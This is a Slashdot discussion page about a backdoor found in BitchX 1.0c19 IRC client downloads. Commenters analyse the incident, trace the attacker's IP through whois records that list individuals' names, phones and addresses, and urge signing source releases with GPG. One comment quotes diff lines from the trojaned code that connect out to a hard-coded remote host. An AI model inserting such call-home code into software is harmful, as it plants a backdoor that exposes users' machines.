Slashdot Mirror

← Back to Stories (view on slashdot.org)

BitchX 1.0c19 IRC Client Backdoored

Posted by michael on from the what-me-worry dept.

JRAC writes "A recent Bugtraq submission has indicated that the popular IRC client, BitchX, contains a backdoor. So far, only certain 1.0c19 files, downloaded from ftp.bitchx.com are reported to contain the malicious code. The BitchX developers have been notified, so hopefully a fix will be issued soon. Looks like irssi wasn't the only one ;)"

5 of 305 comments (clear)

  1. Who's this? by Draoi · · Score: 5, Informative
    There's an interesting IP address hard-coded into the trojaned code;

    + sa.sin_port = htons (6667);
    + sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);
    Doing a reverse-DNS lookup gives;
    ;; QUERY SECTION:
    ;; 17.115.77.213.in-addr.arpa, type = ANY, class = IN

    ;; ANSWER SECTION:
    17.115.77.213.in-addr.arpa. 1H IN PTR wenus.dtcomsa.com.
    .... so who are they??
    --
    Alison

    "It is a miracle that curiosity survives formal education." - Albert Einstein

    1. Re:Who's this? by zdzichu · · Score: 4, Informative

      inetnum 213.77.115.0 - 213.77.115.255
      netname DATACOM
      descr Datacom
      descr Warszawa Bemowo
      country PL
      admin-c AW7760-RIPE
      tech-c RW7118-RIPE
      status ASSIGNED PA
      mnt-by AS5617-MNT
      changed tkielb@cst.tpsa.pl 20000915
      source RIPE

      (stupidly formatted because of lamefilter)

      --
      :wq
    2. Re:Who's this? by Neil+Watson · · Score: 5, Informative
      PL is Poland.

      [nwatson@valetta ~]$whois 213.77.115.17
      % This is the RIPE Whois server.
      % The objects are in RPSL format.
      % Please visit http://www.ripe.net/rpsl for more information.
      % Rights restricted by copyright.
      % See http://www.ripe.net/ripencc/pub-services/db/copyri ght.html

      inetnum: 213.77.115.0 - 213.77.115.255
      netname: DATACOM
      descr: Datacom
      descr: Warszawa Bemowo
      country: PL
      admin-c: AW7760-RIPE
      tech-c: RW7118-RIPE
      status: ASSIGNED PA
      mnt-by: AS5617-MNT
      changed: tkielb@cst.tpsa.pl 20000915
      source: RIPE

      route: 213.77.0.0/16
      descr: TPNET (PL)
      descr: Provider Local Registry
      origin: AS5617
      notify: konradpl@zt.piotrkow.tpsa.pl
      mnt-by: AS5617-MNT
      changed: konradpl@zt.piotrkow.tpsa.pl 20000728
      source: RIPE

      person: Arkadiusz Wrobel
      address: "DataCOM" S. A.
      address: ul Radiowa 21a m20
      address: 01 - 485 Warszawa
      address: POLAND
      phone: +48 606 298639
      fax-no: +48 22 6672495
      e-mail: awrobel@wat.waw.pl
      nic-hdl: AW7760-RIPE
      mnt-by: AS5617-MNT
      changed: tkielb@cst.tpsa.pl 20000915
      source: RIPE

      person: Rafal Wrzosek
      address: "DataCOM" S. A.
      address: ul Kaliskiego 11a /312
      address: 01 - 485 Warszawa
      address: POLAND
      phone: +48 606 145187
      fax-no: +48 22 6672495
      e-mail: awrobel@wat.waw.pl
      nic-hdl: RW7118-RIPE
      mnt-by: AS5617-MNT
      changed: tkielb@cst.tpsa.pl 20000915
      source: RIPE

      Yes, someone has most likely compromised the box and is using it for the backdoor. However, the owners of the box are still responsible for the lack of security that allowed their box to be compromised.

      --
      UNIX/Linux Consulting
  2. Digitally sign your sources... by Cyclops · · Score: 5, Informative

    Many don't digitally sign their sources with a secure key, and thus there is absolutely no way to verify that those sources are the ones the developer intended to release.

    Many think that a simple md5sum alongside the sources is enough. IT IS NOT. Any attacker who replaces the sources can as easily replace the md5sum, which can be generated by anyone.

    A digital signature (I suggest using gpg) can only be generated by YOU if you keep it in a secure place, and use it to sign the sources. The public side of this key should be widely distributed and preferably signed (that is recognized) by third parties... the most trustworthy these third parties can be, the better.

    After the huge attack on the network where such sites as Apache were hosted, other Apache projects which did not sign their packages suddenly started signing them. They got scared. You should be too.

    A lot of people instinctively trust their dns resolutions (oops) and also think that if they go to http://www.mozilla.org they will get their favorite browser for sure. They are also wrong. dns can be spoofed under certain conditions, so they could be going to crackersR.us instead, and downloading a neat trojaned source, for instance.

    The more a project grows in fame, the more it will become a likely target for these kinds of attacks, so the more need to a degree of responsability that should not be needed, but it unfourtunately is since the danger is ubiquitous.

    Be carefull, be very carefull.

    Also avoid using user root period.

  3. Re:XSS in Slashcode by jamie · · Score: 4, Informative

    This post is quite inaccurate and we will be responding, also on bugtraq, momentarily. The author of the post did not contact the Slash development team, or we could have corrected some of his misconceptions.